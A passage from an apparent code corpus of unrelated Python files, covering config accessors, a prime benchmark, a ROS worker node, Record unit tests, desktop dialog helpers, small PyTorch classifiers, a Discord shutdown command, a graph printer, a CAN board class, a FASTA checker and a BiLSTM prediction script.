            # Section absent => the dialog was never configured.
            return None

    def get_default_telegram_dialog_id(self):
        """Return the default dialog id (may be the empty string)."""
        return self.get(self.telegram_dialog_section_header, "default_dialog_id")

    def save_default_telegram_dialog_id(self, value):
        """Store and persist the default dialog id."""
        self.set(self.telegram_dialog_section_header, "default_dialog_id", value)
        self.save()

    def get_trade_port(self):
        """Return the trade-account port setting (as a string)."""
        return self.get(self.trade_account_section_header, "port")

    def save_trade_port(self, value):
        """Store and persist the trade-account port."""
        self.set(self.trade_account_section_header, "port", value)
        self.save()

    def get_telegram_setting(self, code):
        """Return a value from the telegram section."""
        return self.get(self.telegram_section_header, code)

    def set_telegram_setting(self, code, value):
        """Set a telegram-section value (not persisted until save())."""
        self.set(self.telegram_section_header, code, value)

    def get_trade_setting(self, code):
        """Return a value from the trade-settings section."""
        return self.get(self.trade_section_header, code)

    def set_trade_setting(self, code, value):
        """Set a trade-settings value (not persisted until save())."""
        self.set(self.trade_section_header, code, value)
| 5,275 | 1,643 |
from libs.primelib import Prime
import cProfile
import time
# Test variables: index of the prime to look up, and a large candidate
# for the primality check.
primeindex = 100000
primecheck = 1000000000000
def _run_test(label, func, arg):
    """Print `label`, time a single call of func(arg), and print the value and elapsed seconds."""
    print(label)
    start = time.perf_counter()
    value = func(arg)
    end = time.perf_counter()
    print('value: ' + str(value))
    print('time: ' + str(end - start))
    print()


def main():
    """Benchmark Prime.getByIndex / Prime.checkIfPrime; repeats reveal caching effects.

    Uses time.perf_counter() — time.clock() was deprecated in 3.3 and removed
    in Python 3.8, so the original code crashes on modern interpreters.
    """
    prime = Prime()
    _run_test('test 1:', prime.getByIndex, primeindex)
    _run_test('test 2:', prime.getByIndex, primeindex)

    prime1 = Prime()
    prime2 = Prime()
    _run_test('test 4:', prime1.checkIfPrime, primecheck)
    _run_test('test 5:', prime1.checkIfPrime, primecheck)
    _run_test('test 6:', prime2.checkIfPrime, primecheck)
    _run_test('test 7:', prime2.checkIfPrime, primecheck)
# Script entry point.
if __name__ == '__main__':
    main()
| 1,430 | 519 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ROS
import rospy
from std_msgs.msg import String
# Robonomics communication
from robonomics_msgs.msg import Demand, Result
from ipfs_common.msg import Multihash
from ipfs_common.ipfs_rosbag import IpfsRosBag
class WorkerNode:
    """ROS node that answers Robonomics demands matching the configured model."""

    def __init__(self):
        rospy.init_node("worker_node")
        rospy.loginfo("Launching worker node...")
        # React to every demand arriving on the liability info channel.
        rospy.Subscriber('/liability/infochan/incoming/demand', Demand, self.on_incoming_demand)
        self.result_publish = rospy.Publisher('/liability/infochan/eth/signing/result', Result, queue_size=128)
        rospy.loginfo("The node is launched")

    def on_incoming_demand(self, demand: Demand):
        """Respond to a demand only when its model matches the ~model parameter."""
        rospy.loginfo("Incoming demand: {}".format(demand))
        if demand.model.multihash != rospy.get_param("~model"):
            rospy.loginfo("Demand is not for me")
            return
        self.send_result(demand)

    def pack_result(self) -> Multihash:
        """Bundle the sensor payload into an IPFS rosbag and return its multihash."""
        payload = {
            "/data": [
                String("Hello from my sensor!")
            ]
        }
        return IpfsRosBag(messages=payload).multihash

    def send_result(self, demand: Demand):
        """Publish a successful Result addressed to the demand's sender."""
        rospy.loginfo("Collecting data...")
        outcome = Result()
        outcome.liability = demand.sender
        outcome.result = self.pack_result()
        outcome.success = True
        rospy.loginfo("Result: {}".format(outcome))
        self.result_publish.publish(outcome)

    def spin(self):
        """Block, processing callbacks until the node shuts down."""
        rospy.spin()
# Script entry point: construct the node and block until shutdown.
if __name__ == "__main__":
    WorkerNode().spin()
| 1,579 | 529 |
#!/usr/bin/env python
# encoding: utf-8
"""
copyright (c) 2016-2017 Earth Advantage. All rights reserved.
..codeauthor::Paul Munday <paul@paulmunday.net>
Unit tests for dubplate.
"""
# Imports from Standard Library
import datetime
import json
import sys
import six
import unittest
# Imports from Third Party Modules
from frozendict import frozendict
# Local Imports
from dubplate import Record, empty_slot
# Use the stdlib mock on Python 3, the backported package on Python 2.
PY3 = sys.version_info[0] == 3
if PY3:
    from unittest import mock
else:
    import mock
# Constants
NS = 'http://example.org/ns'
NAMESPACE = {'n': NS}
class TstRecord(Record):
    """Concrete Record subclass used as the base fixture for these tests."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    __slots__ = ['service', 'test']

    def __init__(self, service, test, **kwargs):
        # 'service' and 'test' become slot attributes; everything else is record data.
        self.service = service
        self.test = test
        super(TstRecord, self).__init__(**kwargs)
class FieldRecord(TstRecord):
    """Record restricted to fields a/b/c, with a and b required non-null."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    fields = ('a', 'b', 'c')
    non_null_fields = ('a', 'b')
class RequiredFieldRecord(TstRecord):
    """Record requiring non-null a and b, with no field whitelist."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    non_null_fields = ('a', 'b')
class RequireAllFieldsRecord(TstRecord):
    """Record where every declared field (a, b, c) must be supplied."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    fields = ('a', 'b', 'c')
    non_null_fields = ('a', 'b')
    require_all_fields = True
class HashIndexRecord(TstRecord):
    """Record whose hash-index key is derived from record fields a and b."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    hash_index_fields = ('a', 'b')
class HashIndexSlotsRecord(TstRecord):
    """Record whose hash-index key mixes a slot attribute ('test') with record fields."""
    # pylint:disable=slots-on-old-class,too-few-public-methods
    hash_index_fields = ('test', 'a', 'b')
class RecordTests(unittest.TestCase):
    """Test base record class"""

    def setUp(self):
        # Fresh record for every test: two data keys plus the two slot attributes.
        self.rdict = {'color': 'red', 'number': 10}
        self.record = TstRecord('service', 'test', **self.rdict)

    def test_record_access(self):
        """Slot attributes and record data live in separate namespaces."""
        # test attributes and record data set
        self.assertEqual(self.record.test, 'test')
        self.assertEqual(self.record['color'], 'red')
        # test difference between attributes and record data
        with self.assertRaises(KeyError) as conm:
            # pylint:disable=pointless-statement
            self.record['test']
        self.assertEqual(str(conm.exception), "'test'")
        with self.assertRaises(AttributeError) as conm:
            # pylint:disable=pointless-statement,no-member
            self.record.color
        self.assertEqual(
            str(conm.exception), "'TstRecord' object has no attribute 'color'"
        )

    def test_is_immutable(self):
        """Neither attributes nor items can be assigned or deleted after init."""
        with self.assertRaises(TypeError) as conm:
            self.record.test = 1
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support attribute assignment"
        )
        with self.assertRaises(TypeError) as conm:
            self.record['number'] = 1
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support item assignment"
        )
        with self.assertRaises(TypeError) as conm:
            del self.record.test
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support attribute deletion"
        )
        with self.assertRaises(TypeError) as conm:
            del self.record['number']
        self.assertEqual(
            str(conm.exception),
            "'TstRecord' object does not support item deletion"
        )

    def test_repr(self):
        # TODO: the dict portion makes this test intermittently problematic
        # (dict ordering in repr); left disabled until a stable form is chosen.
        # self.assertEqual(
        #     repr(self.record), "<TstRecord, {'color': 'red', 'number': 10}>"
        # )
        pass

    def test_dict_like(self):
        """Record supports the read-only mapping protocol and hashes like frozendict."""
        self.assertIn('color', self.record)
        self.assertNotIn('test', self.record)
        self.assertEqual(self.record, {'color': 'red', 'number': 10})
        self.assertNotEqual(self.record, {'color': 'red', 'number': 1})
        self.assertEqual(len(self.record), 2)
        # hash is hash of record
        fdt = frozendict({'color': 'red', 'number': 10})
        self.assertEqual(hash(self.record), hash(fdt))
        self.assertEqual(self.record.get('color', 'blue'), 'red')
        self.assertNotEqual(self.record.get('color', 'blue'), 'blue')
        self.assertEqual(self.record.get('other', 'blue'), 'blue')
        six.assertCountEqual(
            self,
            list(self.record.items()), [('color', 'red'), ('number', 10)]
        )
        self.assertDictEqual(
            {'color': 'red', 'number': 10},
            {key: val for key, val in self.record.items()}
        )
        six.assertCountEqual(
            self,
            ['color', 'number'], list(self.record.keys())
        )
        six.assertCountEqual(
            self,
            ['color', 'number'], [key for key in self.record.keys()]
        )
        six.assertCountEqual(
            self,
            ['red', 10], list(self.record.values())
        )
        six.assertCountEqual(
            self,
            ['red', 10], [value for value in self.record.values()]
        )

    def test_non_null_fields(self):
        """non_null_fields must be present and not None; error messages are exact."""
        # raises error if attribute not set
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, a=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following field is required: b'"
        )
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, d=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following fields are required: a, b'"
        )
        # raises errror if required field is None
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, a=2, b=None)
        self.assertEqual(
            str(conm.exception),
            "'The following field can not be None: b'"
        )
        with self.assertRaises(KeyError) as conm:
            RequiredFieldRecord('red', 1, a=None, b=None)
        self.assertEqual(
            str(conm.exception),
            "'The following fields can not be None: a, b'"
        )
        # ok to set extra fields if fields not defined
        rec = RequiredFieldRecord('red', 1, a=1, b=2, c=3)
        # if we are here no error raised
        assert rec

    def test_fields(self):
        """`fields` whitelists keys and fixes their iteration order."""
        # test rejects extra fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=3, c=4, d=5)
        self.assertEqual(
            str(conm.exception),
            "'Extra keys: d. "
            "Only the following keys can be used in the record: a, b, c'"
        )
        # test ok
        rec = FieldRecord('red', 1, a=2, b=3, c=4)
        assert rec
        # test ok for non-required fields to be None
        rec = FieldRecord('red', 1, a=2, b=3, c=None)
        assert rec
        # test required fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following field is required: b'"
        )
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, d=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following fields are required: a, b'"
        )
        # raises errror if required field is None
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=None, c=None)
        self.assertEqual(
            str(conm.exception),
            "'The following field can not be None: b'"
        )
        # test ordering
        rec = FieldRecord('red', 1, a=2, c=4, b=3)
        expected = ['a', 'b', 'c']
        result = [key for key in rec.keys()]
        self.assertEqual(expected, result)

    def test_require_all_fields(self):
        """require_all_fields forces every declared field to be supplied.

        NOTE(review): everything after the first assertion block duplicates
        test_fields verbatim (copy-paste); consider trimming.
        """
        # test requires all fields
        with self.assertRaises(KeyError) as conm:
            RequireAllFieldsRecord('red', 1, a=2, b=3)
        self.assertEqual(
            str(conm.exception),
            "'Missing keys: c. "
            "The following keys must be used in the record: a, b, c'"
        )
        # test rejects extra fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=3, c=4, d=5)
        self.assertEqual(
            str(conm.exception),
            "'Extra keys: d. "
            "Only the following keys can be used in the record: a, b, c'"
        )
        # test ok
        rec = FieldRecord('red', 1, a=2, b=3, c=4)
        assert rec
        # test ok for non-required fields to be None
        rec = FieldRecord('red', 1, a=2, b=3, c=None)
        assert rec
        # test required fields
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following field is required: b'"
        )
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, d=2, c=3)
        self.assertEqual(
            str(conm.exception),
            "'The following fields are required: a, b'"
        )
        # raises errror if required field is None
        with self.assertRaises(KeyError) as conm:
            FieldRecord('red', 1, a=2, b=None, c=None)
        self.assertEqual(
            str(conm.exception),
            "'The following field can not be None: b'"
        )
        # test ordering
        rec = FieldRecord('red', 1, a=2, c=4, b=3)
        expected = ['a', 'b', 'c']
        result = [key for key in rec.keys()]
        self.assertEqual(expected, result)

    def test_copy_record(self):
        """Test copy_record method"""
        copy = self.record.copy_record()
        self.assertEqual(copy, self.rdict)
        copy = self.record.copy_record(color='green')
        self.assertEqual(copy, {'color': 'green', 'number': 10})
        # ensure extra/incorrect fields can't be set
        record = FieldRecord('red', 1, a=2, b=3, c=4)
        self.assertRaises(
            KeyError, record.copy_record, colorx='green'
        )
        # ensure non-null fields can't be set to None
        self.assertRaises(
            KeyError, record.copy_record, a=None
        )

    def test_json(self):
        """Test json() method"""
        # datetimes/dates serialize to ISO strings; tuples become lists;
        # slot attributes (service/test) are excluded from the output.
        dtime = datetime.datetime(2001, 1, 1, 1, 1, 1, 100)
        date = datetime.date(2001, 1, 1)
        json_record = TstRecord(
            service='service', test='test',
            string='test', integer=1,
            datetime=dtime, date=date,
            lst=[dtime, date],
            tpl=(dtime, date),
            dictionary=dict(datetime=dtime, date=date)
        )
        dtime_str = '2001-01-01T01:01:01'
        date_str = '2001-01-01'
        result = json_record.json()
        self.assertIsInstance(result, str)
        result = json.loads(result)
        self.assertNotIn('service', result)
        self.assertNotIn('test', result)
        self.assertEqual(result['string'], 'test')
        self.assertIsInstance(result['integer'], int)
        self.assertEqual(result['integer'], 1)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
        self.assertEqual(result['lst'], [dtime_str, date_str])
        self.assertEqual(result['tpl'], [dtime_str, date_str])
        result = result['dictionary']
        self.assertIsInstance(result, dict)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
        # Records nest: a record value serializes as an embedded object.
        json_record2 = TstRecord(
            service='service', test='test',
            record=json_record
        )
        result = json_record2.json()
        self.assertIsInstance(result, str)
        result = json.loads(result)
        self.assertNotIn('service', result)
        self.assertNotIn('test', result)
        result = result['record']
        self.assertIsInstance(result, dict)
        self.assertNotIn('service', result)
        self.assertNotIn('test', result)
        self.assertEqual(result['string'], 'test')
        self.assertIsInstance(result['integer'], int)
        self.assertEqual(result['integer'], 1)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)
        self.assertEqual(result['lst'], [dtime_str, date_str])
        self.assertEqual(result['tpl'], [dtime_str, date_str])
        result = result['dictionary']
        self.assertIsInstance(result, dict)
        self.assertEqual(result['datetime'], dtime_str)
        self.assertEqual(result['date'], date_str)

    def test_empty_slot(self):
        """Test empty_slot"""
        # Unset slots on the class are placeholder empty_slot instances.
        service = getattr(TstRecord, 'service')
        self.assertTrue(isinstance(service, empty_slot))

    @mock.patch('dubplate.generate_hash_index_key')
    def test_get_hash_index_key(self, mock_hash_index_key):
        """Test get_hash_index_key"""
        # Key fields fall back: hash_index_fields > fields > [] (whole record).
        mock_hash_index_key.return_value = ''
        rec = TstRecord('service', 'test', a=1, b=2)
        rec.get_hash_index_key()
        mock_hash_index_key.assert_called_with(
            rec.__class__.__name__, [], rec
        )
        fields_rec = FieldRecord('service', 'test', a=1, b=2)
        fields_rec.get_hash_index_key()
        mock_hash_index_key.assert_called_with(
            fields_rec.__class__.__name__, fields_rec.fields, fields_rec
        )
        hash_rec = HashIndexRecord('service', 'test', a=1, b=2)
        hash_rec.get_hash_index_key()
        mock_hash_index_key.assert_called_with(
            hash_rec.__class__.__name__, hash_rec.hash_index_fields, hash_rec
        )
        # When hash_index_fields name slot attributes, their values are merged
        # into the mapping passed to the key generator.
        slot_rec = HashIndexSlotsRecord('service', 'test', a=1, b=2)
        slot_rec.get_hash_index_key()
        expected_val_dict = frozendict({'test': 'test', 'a': 1, 'b': 2})
        mock_hash_index_key.assert_called_with(
            slot_rec.__class__.__name__, slot_rec.hash_index_fields,
            expected_val_dict
        )
| 14,009 | 4,454 |
import subprocess
import cli
def ask(message, choices=None, options=None):
    """Prompt the user with yad: free text when choices is None, otherwise a list.

    A dict maps displayed labels to returned values; a list returns the
    selection itself. Returns a falsy value when the dialog is dismissed.
    """
    options = {"text": f"<big>{message}</big>"} | (options or {})
    if choices is None:
        answer = run("entry", options=options)
        return answer and answer.strip()
    if isinstance(choices, list):
        return ask_choices(choices, options=options)
    if isinstance(choices, dict):
        picked = ask_choices(list(choices.keys()), options=options)
        return picked and choices[picked]
    raise Exception("Choices parameter not valid")
def ask_choices(choices, options=None):
    """Show a yad list dialog and return the originally supplied choice picked."""
    # Truncate displayed text to 100 chars (longer options break yad) while
    # remembering which original choice each display string stands for.
    display_mapping = {
        c[:100]: c for c in choices
    }
    separator = "###"
    options = {"separator": separator, "no-headers": None} | (options or {})
    items = ["--column=text", "--column=@font@"]
    for displayed in display_mapping:
        items.append(displayed)
        items.append("Monospace 15")
    selection = run("list", args=items, options=options)
    selection = selection and selection.split(separator)[0]
    return selection and display_mapping[selection]
def run(subcommand, args=None, options=None):
    """Invoke `yad --<subcommand>`; caller options override the window defaults."""
    merged = {
        "geometry": "907x514+500+200",
        "title": "",
        "text-align": "center",
        "icon-theme": "Win11",
        "fontname": "Noto Sans 40",
    } | (options or {})
    # cli.get receives the options mapping as a trailing positional argument.
    return cli.get("yad", f"--{subcommand}", *(args or []), merged, check=False)
def ask_yn(question):
    """Show a kdialog yes/no box; True when the user confirms (exit code 0)."""
    completed = subprocess.run(("kdialog", "--yesno", question), capture_output=True)
    return completed.returncode == 0
| 1,582 | 518 |
# DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
#
# This material is based upon work supported by the Assistant Secretary of Defense for Research and
# Engineering under Air Force Contract No. FA8721-05-C-0002 and/or FA8702-15-D-0001. Any opinions,
# findings, conclusions or recommendations expressed in this material are those of the author(s) and
# do not necessarily reflect the views of the Assistant Secretary of Defense for Research and
# Engineering.
#
# © 2018 Massachusetts Institute of Technology.
#
# MIT Proprietary, Subject to FAR52.227-11 Patent Rights - Ownership by the contractor (May 2014)
#
# The software/firmware is provided to you on an As-Is basis
#
# Delivered to the U.S. Government with Unlimited Rights, as defined in DFARS Part 252.227-7013 or
# 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government rights in this work are
# defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed above. Use of this work other than
# as specifically authorized by the U.S. Government may violate any copyrights that exist in this
# work.
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.autograd import Variable
import numpy as np
import torch
from matplotlib import pyplot as plt
import matplotlib.cm as cm
from collections import defaultdict
from collections import OrderedDict
class NumberNet(nn.Module):
    """Tiny classifier mapping a scalar float to one of five classes.

    Deliberately small enough that the whole network can be visualized
    and understood.
    """

    def __init__(self):
        super(NumberNet, self).__init__()
        # One linear layer: 1 input feature -> 5 class scores.
        self.layer = nn.Linear(1, 5)

    def forward(self, x):
        logits = self.layer(x)
        return logits.view(-1, 5)
class DeepNumberNet(nn.Module):
    """NumberNet with a deep stack of hidden layers.

    BUG FIX: the original OrderedDict reused several key names ('layer2',
    'layer3', 'activation2', 'activation5').  Duplicate keys silently
    overwrite earlier entries, so several Linear layers were dropped and
    two Linears ended up adjacent with no activation between them.  The
    names are now unique, registering every layer as written.
    """

    def __init__(self):
        super(DeepNumberNet, self).__init__()
        # 1 -> 20, seven 20 -> 20 hidden layers, then 20 -> 5 output,
        # each followed by LeakyReLU.
        self.model = nn.Sequential(OrderedDict([
            ('layer1', nn.Linear(1, 20)),
            ('activation1', nn.LeakyReLU()),
            ('layer2', nn.Linear(20, 20)),
            ('activation2', nn.LeakyReLU()),
            ('layer3', nn.Linear(20, 20)),
            ('activation3', nn.LeakyReLU()),
            ('layer4', nn.Linear(20, 20)),
            ('activation4', nn.LeakyReLU()),
            ('layer5', nn.Linear(20, 20)),
            ('activation5', nn.LeakyReLU()),
            ('layer6', nn.Linear(20, 20)),
            ('activation6', nn.LeakyReLU()),
            ('layer7', nn.Linear(20, 20)),
            ('activation7', nn.LeakyReLU()),
            ('layer8', nn.Linear(20, 20)),
            ('activation8', nn.LeakyReLU()),
            ('layer9', nn.Linear(20, 5)),
            ('activation9', nn.LeakyReLU())
        ]))

    def forward(self, x):
        output = self.model(x)
        return output.view(-1, 5)
def dsig(x):
    """Derivative-of-sigmoid activation, scaled so its peak (at x=0) is 1:

        4 e^x
       -------
      (e^x + 1)^2

    BUG FIX: computed as 4*s*(1-s) with s = sigmoid(x).  This is
    algebraically identical (s = e^x/(1+e^x), 1-s = 1/(1+e^x)) but
    numerically stable: the original direct form overflows torch.exp for
    large x and returns inf/inf = NaN.
    """
    s = torch.sigmoid(x)
    return 4.0 * s * (1.0 - s)
class DSigNet(nn.Module):
    """A simple network to test the dsig activation.

    Intuition: monotonic activations partition the input space into half
    spaces, which are unbounded, so networks built from them inevitably
    produce confident predictions for out-of-domain inputs.  dsig instead
    yields completely bounded response regions.  More nodes may be needed
    to approximate the same function (one per bounded section rather than
    one half space covering many), but the resulting collection of bounded
    spaces approximates the training domain itself much better.
    """

    def __init__(self):
        super(DSigNet, self).__init__()
        self.layer = nn.Linear(1, 5)

    def forward(self, x):
        activations = dsig(self.layer(x))
        return activations.view(-1, 5)
def plot_decision_boundary(number_net, numbers=None, span=(-10, 1)):
    """Plot the class-probability curves of *number_net* over a 1-D span.

    number_net: a model mapping (N, 1) float tensors to (N, 5) scores.
    numbers: optional dataset exposing .data and .labels; when provided,
        the training points are scattered at y=0 in their class colors.
        Defaults to None (backward-compatible generalization: the
        __main__ loop calls this without a dataset).
    span: (lower, upper) integer bounds of the plotted input range.
    """
    lower, upper = span
    plt.ylim(-0.2, 1.2)
    plt.xlim(lower, upper)
    plt.xticks([i for i in range(lower, upper + 1) if i % 5 == 0])
    # 10 sample points per unit of input range.
    domain = np.linspace(lower, upper, (upper - lower) * 10)
    inputs = torch.tensor(domain).float().view(-1, 1)
    outputs = number_net(inputs)
    softmax = F.softmax(outputs, 1).detach().numpy()
    labels = [0, 1, 2, 3, 4]
    # One rainbow color per class, shared by curves and scatter points.
    colors = iter(cm.rainbow(np.linspace(0, 1, len(labels))))
    color_dict = {label: next(colors) for label in labels}
    for label in labels:
        plt.plot(domain, softmax[:, label], color=color_dict[label])
    if numbers is not None:
        train_dict = defaultdict(list)
        for value, la in zip(numbers.data, numbers.labels):
            train_dict[la].append(value)
        for label in labels:
            plt.scatter(train_dict[label], [0] * len(train_dict[label]),
                        color=color_dict[label])
    plt.show()
def plot_loss(loss_history):
    """Line-plot the per-epoch loss history and block until closed."""
    epochs = np.arange(0, len(loss_history))
    plt.plot(epochs, loss_history)
    plt.show()
if __name__ == "__main__":
    # number_net = NumberNet()
    # deep_number_net = DeepNumberNet()
    dsig_net = DSigNet()
    criterion = nn.CrossEntropyLoss()
    optimizer = optim.SGD(dsig_net.parameters(), lr=0.01, momentum=0.9)
    # NOTE(review): `Numbers` is not defined or imported in this file —
    # presumably a Dataset class from a sibling module; confirm the import.
    dataloader = DataLoader(Numbers(), shuffle=True, batch_size=5)
    loss_history = []
    for epoch in range(100000):
        running_loss = 0.0
        for data, labels in dataloader:
            # Variable() is a deprecated no-op since torch 0.4; plain
            # tensors carry autograd state directly.
            data = data.float().view(-1, 1)
            labels = labels.long()
            optimizer.zero_grad()
            outputs = dsig_net(data)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
        loss_history.append(running_loss)
        print("Loss: " + str(running_loss))
        print()
        # Periodically plot the loss curve and decision boundaries.
        if epoch % 10000 == 0:
            if epoch % 50000 == 0:
                plot_loss(loss_history)
            # BUG FIX: original called plot_decision_boundary(dsig_net)
            # without the required `numbers` dataset argument.
            plot_decision_boundary(dsig_net, dataloader.dataset)
            input("To continue press enter")
| 7,425 | 2,424 |
import discord
from config import *
class ShutDown:
    """Owner-only chat command: announce shutdown and close the bot."""

    # BUG FIX: the `bot` annotation was `discord.Client()` — a *call* that
    # instantiated a throwaway client whenever this method was defined;
    # the class itself is the correct annotation.
    def __init__(self, message: discord.Message, bot: discord.Client):
        self.bot = bot
        self.message = message

    async def run(self):
        # Only user ids listed in the OWNER config may shut the bot down.
        if self.message.author.id in OWNER:
            await self.message.channel.send('Shut down')
            await self.bot.close()
import textwrap
import click
def show_ugraph(ugraph, oneline=False, ignore_unknown_op=False):
    """Pretty-print the ops of *ugraph* in topological order.

    oneline: compact one-line-per-op format instead of a paragraph per op.
    ignore_unknown_op: suppress the red "Unknown Ops Detected" report for
        ops the OperatorFactory does not support.
    Returns 0.
    """
    from utensor_cgen.backend.utensor.code_generator.legacy._operators import OperatorFactory
    unknown_ops = set()
    if oneline:
        tmpl = click.style("{op_name} ", fg='yellow', bold=True) + \
            "op_type: {op_type}, inputs: {inputs}, outputs: {outputs}"
        for op_name in ugraph.topo_order:
            op_info = ugraph.ops_info[op_name]
            msg = tmpl.format(op_name=op_name, op_type=op_info.op_type,
                              inputs=[tensor.name for tensor in op_info.input_tensors],
                              outputs=[tensor.name for tensor in op_info.output_tensors])
            click.echo(msg)
            if not OperatorFactory.is_supported(op_info.op_type):
                unknown_ops.add(op_info)
    else:
        # BUG FIX: "ouptut(s)" typo in the printed template.
        tmpl = click.style('op_name: {op_name}\n', fg='yellow', bold=True) + \
            '''\
op_type: {op_type}
input(s):
{inputs}
{input_shapes}
output(s):
{outputs}
{output_shapes}
'''
        tmpl = textwrap.dedent(tmpl)
        paragraphs = []
        for op_name in ugraph.topo_order:
            op_info = ugraph.ops_info[op_name]
            op_str = tmpl.format(
                op_name=op_name,
                op_type=op_info.op_type,
                inputs=op_info.input_tensors,
                outputs=op_info.output_tensors,
                input_shapes=[tensor.shape for tensor in op_info.input_tensors],
                output_shapes=[tensor.shape for tensor in op_info.output_tensors])
            paragraphs.append(op_str)
            if not OperatorFactory.is_supported(op_info.op_type):
                unknown_ops.add(op_info)
        click.echo('\n'.join(paragraphs))
    click.secho(
        'topological ordered ops: {}'.format(ugraph.topo_order),
        fg='white', bold=True,
    )
    if unknown_ops and not ignore_unknown_op:
        click.echo(
            click.style('Unknown Ops Detected', fg='red', bold=True)
        )
        for op_info in unknown_ops:
            click.echo(
                click.style('    {}: {}'.format(op_info.name, op_info.op_type), fg='red')
            )
    return 0
| 2,018 | 725 |
# board.py
# abstract class for zorg and edge
import time
from ocan import *
class Board():
    """Abstract base for Zorg and Edge CAN boards.

    Construction wires up the CAN bus (OCan), loads the hardware driver
    named in the manifest, registers manifest parameters, and boots.
    """
    can_id = None
    pause = True
    ocan = None

    def __init__(self, manifest):
        self.manifest = manifest
        # BUG FIX: `parameters` was never initialized, so the append in
        # init_board() raised AttributeError.
        self.parameters = []
        self.ocan = OCan()
        self.init_board()
        self.init_filters()
        self.boot()

    def init_filters(self):
        # Accept everything: filter 0 with mask/id (0, 0).
        self.ocan._setfilter(0, (0, 0))

    def init_board(self):
        """Set up board hardware as described by the manifest driver entry."""
        if "driver" in self.manifest:
            driver = self.manifest['driver']
            print("init_board driver:", driver)
            # The driver module and its class share the same name.
            module = __import__(driver)
            print("init_board module:", module)
            driver = getattr(module, driver)
            self.driver = driver()
            # manifest parameters create 2 things:
            #   1. list of names in self.parameters
            #   2. dict in driver.parameters
            for parameter in self.manifest['parameters']:
                self.parameters.append(parameter['name'])
                # NOTE(review): assumes the driver instance exposes a
                # `parameters` dict — confirm against the driver classes.
                self.driver.parameters[parameter['name']] = parameter
        if "init" in self.manifest:
            # Optional named init hook resolved on the driver instance.
            init = self.manifest['init']
            print("init_board init:", init)
            init = getattr(self.driver, init)
            init()

    def boot(self):
        # Zorg just goes, Edge waits on Zorg; subclasses override.
        pass
| 1,396 | 383 |
import rob
import sys
# 1404927386.fasta analyzed_sequences.txt annotations.txt
#
faf = None
try:
    faf = sys.argv[1]
except IndexError:
    sys.stderr.write("Please provide a fasta file\n")
    # BUG FIX: exit status was 0 on the error path; use non-zero.
    sys.exit(1)

fa = rob.readFasta(faf)

# Use sets for O(1) membership — the "NOT ANALYZED/ANNOTATED" loops below
# were O(n^2) with list membership tests.
analyzed = set()
with open('analyzed_sequences.txt', 'r') as asf:
    for line in asf:
        seq_id = line.rstrip()
        analyzed.add(seq_id)
        if seq_id not in fa:
            sys.stderr.write(seq_id + " has been analyzed but is not in " + faf + "\n")
for f in fa:
    if f not in analyzed:
        sys.stderr.write("NOT ANALYZED: " + f + "\n")

annotated = set()
with open('annotations.txt', 'r') as asf:
    for line in asf:
        fields = line.split("\t")
        annotated.add(fields[0])
        if fields[0] not in fa:
            sys.stderr.write(fields[0] + " has been annotated but is not in " + faf + "\n")
for f in fa:
    if f not in annotated:
        sys.stderr.write("NOT ANNOTATED: " + f + "\n")
| 962 | 375 |
import os
import tqdm
import torch
import numpy as np
from parser import parse_args
from scene.data import DataSet
from torchtext.data import Iterator
from scene.data.loaders import BatchWrapper
from scene.models import BiLSTM
def predict(model, loader):
    """Run *model* over *loader* in eval mode and return per-batch argmax labels.

    Returns a numpy array with one entry per batch (each the argmax index
    tensor for that batch).
    """
    model.eval()
    predictions = []
    # Inference only: no_grad avoids building autograd graphs (memory/speed).
    with torch.no_grad():
        for data in tqdm.tqdm(loader):
            scores = model(data)
            _, pred = torch.max(scores.data, 1)
            predictions.append(pred)
    return np.array(predictions)
def main():
    """Load the saved BiLSTM checkpoint and write test-set predictions to disk."""
    args = parse_args()
    torch.manual_seed(args.seed)
    use_cuda = not args.no_cuda and torch.cuda.is_available()
    device = torch.device("cuda" if use_cuda else "cpu")
    data = DataSet(args.datapath)
    train_data, val_data, test_data = data.load_splits()
    vocab = data.textfield.vocab
    # batch_size=1, no sorting/repeat: preserve test-set order for the
    # saved predictions.
    test_iter = Iterator(
        test_data,
        batch_size=1,
        device=device,
        sort=False,
        sort_within_batch=False,
        repeat=False
    )
    testloader = BatchWrapper(test_iter)
    savepath = os.path.join(args.savepath, 'bilstm_small_val.pth')
    savepoint = torch.load(savepath)
    model = BiLSTM(num_vocab=len(vocab), n_classes=10).to(device)
    model.load_state_dict(savepoint['model_state_dict'])
    # BUG FIX: predictions were computed on the raw Iterator; the
    # BatchWrapper built just above was never used.
    predictions = predict(model, testloader)
